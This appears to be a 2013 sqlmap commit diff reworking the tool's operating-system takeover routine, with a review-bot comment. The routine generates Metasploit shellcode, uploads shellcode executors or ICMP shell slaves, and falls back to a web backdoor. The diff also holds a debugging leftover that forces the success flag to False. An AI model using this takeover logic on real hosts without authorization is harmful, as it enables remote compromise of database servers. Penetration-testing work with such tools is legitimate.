fixes #396 - adapted the engine to properly verify that all steps of the takeover were successful, minor code refactoring too

This commit is contained in:
Bernardo Damele 2013-02-14 18:32:22 +00:00
parent 614ff6029d
commit d8942d2ae0


@ -15,6 +15,7 @@ from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import OS from lib.core.enums import OS
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges from lib.core.exception import SqlmapMissingPrivileges
@ -86,6 +87,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
def osPwn(self): def osPwn(self):
goUdf = False goUdf = False
fallbackToWeb = False
setupSuccess = False
self.checkDbmsOs() self.checkDbmsOs()
@ -152,10 +155,11 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
self.sysUdfs.pop("sys_bineval") self.sysUdfs.pop("sys_bineval")
self.getRemoteTempPath()
if isStackingAvailable() or conf.direct: if isStackingAvailable() or conf.direct:
web = False web = False
self.getRemoteTempPath()
self.initEnv(web=web) self.initEnv(web=web)
if tunnel == 1: if tunnel == 1:
@ -184,30 +188,50 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
if goUdf: if goUdf:
exitfunc = "thread" exitfunc = "thread"
setupSuccess = True
else: else:
exitfunc = "process" exitfunc = "process"
self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
if not goUdf: if not goUdf:
self.uploadShellcodeexec() setupSuccess = self.uploadShellcodeexec(web=web)
if Backend.isOs(OS.WINDOWS) and conf.privEsc: print "forcing setupSuccess to False"
setupSuccess = False
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
else:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc:
debugMsg = "by default MySQL on Windows runs as SYSTEM " debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate" debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg) logger.debug(debugMsg)
elif tunnel == 2:
self.uploadIcmpshSlave(web=web)
self.icmpPwn()
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web)
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
else:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb):
web = True web = True
if fallbackToWeb:
infoMsg = "falling back to web backdoor to establish the tunnel"
else:
infoMsg = "going to use a web backdoor to establish the tunnel" infoMsg = "going to use a web backdoor to establish the tunnel"
logger.info(infoMsg) logger.info(infoMsg)
self.initEnv(web=web) self.initEnv(web=web, forceInit=fallbackToWeb)
if self.webBackdoorUrl: if self.webBackdoorUrl:
if not Backend.isOs(OS.WINDOWS) and conf.privEsc: if not Backend.isOs(OS.WINDOWS) and conf.privEsc:
@ -220,23 +244,30 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
warnMsg += "back-end DBMS underlying system is not Windows" warnMsg += "back-end DBMS underlying system is not Windows"
logger.warn(warnMsg) logger.warn(warnMsg)
self.getRemoteTempPath()
if tunnel == 1: if tunnel == 1:
self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
self.uploadShellcodeexec(web=web) setupSuccess = self.uploadShellcodeexec(web=web)
if setupSuccess is not True:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web)
if setupSuccess is not True:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
if setupSuccess:
if tunnel == 1:
self.pwn(goUdf)
elif tunnel == 2: elif tunnel == 2:
self.uploadIcmpshSlave(web=web)
self.icmpPwn() self.icmpPwn()
else: else:
errMsg = "unable to prompt for an out-of-band session because " errMsg = "unable to prompt for an out-of-band session"
errMsg += "stacked queries SQL injection is not supported"
raise SqlmapNotVulnerableException(errMsg) raise SqlmapNotVulnerableException(errMsg)
if tunnel == 1:
if not web or (web and self.webBackdoorUrl is not None):
self.pwn(goUdf)
if not conf.cleanup: if not conf.cleanup:
self.cleanup(web=web) self.cleanup(web=web)
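Review bot: The `print "forcing setupSuccess to False"` line and the `setupSuccess = False` that follows `setupSuccess = self.uploadShellcodeexec(web=web)` in the `@ -184,30 +188,50 @@` hunk read as a debugging leftover: they overwrite the upload result, so with a non-UDF payload the stacked-query path always falls back to the web backdoor on MySQL or raises SqlmapFilePathException on other back-ends, whatever uploadShellcodeexec actually returned. Removing those two lines restores the check that the commit message describes. The `if setupSuccess is not True:` tests in the same hunk and in `@ -220,23 +244,30 @@` treat any return other than the bool True as failure; unless uploadShellcodeexec and uploadIcmpshSlave are guaranteed to return a bool (their bodies are not visible here), `if not setupSuccess:` is the safer form. The three-line "unable to mount the operating system takeover" block is repeated four times across those two hunks; a small private helper would keep the message and the exception type in one place. osPwn begins before the first hunk and its body spans several hunks of this section.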